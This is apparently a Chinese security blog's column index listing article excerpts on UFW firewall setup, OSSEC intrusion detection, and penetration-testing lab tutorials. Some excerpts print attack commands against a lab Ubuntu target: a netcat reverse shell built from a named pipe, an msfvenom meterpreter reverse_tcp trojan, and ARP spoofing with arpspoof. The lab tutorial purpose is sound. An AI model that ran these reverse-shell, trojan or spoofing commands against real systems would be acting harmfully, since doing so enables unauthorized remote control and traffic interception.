
网络安全
zhang35
zhangjqfriend@gmail.com
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
Ubuntu 16.04配置UFW防火墙
配置默认策略sudo vim /etc/default/ufw有如下默认规则:IPV6=yes这个开启时,写一条规则将自动变成两条:IPv4的和IPv6的;如果用不上的话可以将其改为no。配置进入规则默认情况下开启ufw,会禁止一切从外到内的连接,可以直接建立白名单规则。也可以手动配置是否禁用一切进入:sudo ufw default allow incomingsudo u...原创 2020-04-27 16:15:56 · 2673 阅读 · 0 评论 -
NC不用-e建立TCP/UDP 反弹连接shell
主机1监听端口,主机2发起连接。TCP shell主机1:nc -nvlp 4444主机2:/bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipeUDP shell攻击机:nc -nuvlp 4444靶机:mkfifo fifonc -u 主机1的IP 4444 < fifo |{ ec...原创 2020-04-26 16:35:34 · 1518 阅读 · 1 评论 -
Kali linux aprspoof arp断网、欺骗攻击
环境攻击机:Kali Linux 2020.1 172.16.252.129靶机:Ubuntu 16.04 172.16.252.138网关:172.16.252.2安装arpspoofKali Linux 2020.1 VM版本身没有arpspoof工具,需要自己安装。arpspoof是dsniff的一个组件,直接安装dsniff:sudo apt-get install dsnif...原创 2020-04-22 11:42:40 · 1351 阅读 · 1 评论 -
Meterpreter session 2 closed. Reason: Died 问题解决方法
问题描述用msf生成Ubuntu 16.04的反向连接木马:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf开启监听:msfconsoleuse exploit/multi/handlerset payload windows/mete...原创 2020-04-22 10:22:22 · 14624 阅读 · 8 评论 -
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
环境攻击机:Kali Linux 2020.1 172.16.252.129靶机:Ubuntu 16.04 172.16.252.138生成木马使用kali自带的Msfvenom工具生成木马。查看有哪些linux下的载荷:msfvenom -l payloads | grep linux针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...原创 2020-04-20 21:50:50 · 10961 阅读 · 0 评论 -
OSSEC文件监控和命令监控(附文件监控测试用例)
OSSEC的log文件监控(LIDS,log-based intrusion detection),能检测攻击、误用、系统错误等。agent端不产生alerts,全部由server集中分析处理。具体参考官方文档:Log monitoring/analysis文件监控ossec-logcollector进程负责监控log文件和事件,有新的日志消息时就转发到server。配置文件为ossec...原创 2020-04-14 16:00:52 · 1664 阅读 · 0 评论 -
OSSEC Agent和Server无法连接的常用检查流程
若Agent和Server无法连接,下面是常用检查流程。检查网络是否连通ping serverIP重启server和agentsudo /var/ossec/bin/ossec-control restart检查rids文件夹OSSEC依赖rids文件夹实现同步。server端/var/ossec/queue/rids 文件夹下应该保存有每个agent ID号同名的文件。假如有...原创 2020-04-14 08:09:30 · 2263 阅读 · 0 评论 -
OSSEC添加Agent 错误Cannot unlink /queue/rids/sender解决方法
服务器端配置添加Agent执行:sudo /var/ossec/bin/manage_agents执行默认的A选项:***************************************** OSSEC HIDS v3.6.0 Agent manager. ** The following options are available: ****************...原创 2020-04-13 10:22:55 · 2598 阅读 · 0 评论 -
Ubuntu16.04安装OSSEC详细步骤
参考官网文档:OSSEC Installation安装环境Ubuntu 16.04 VMware虚拟机安装依赖包安装build-essential来编译安装OSSEC,为了使用系统的pcre2库,安装libpcre2-dev包:apt-get install build-essential make zlib1g-dev libpcre2-dev为了支持数据库,需要安装mysq...原创 2020-04-12 13:54:26 · 2055 阅读 · 1 评论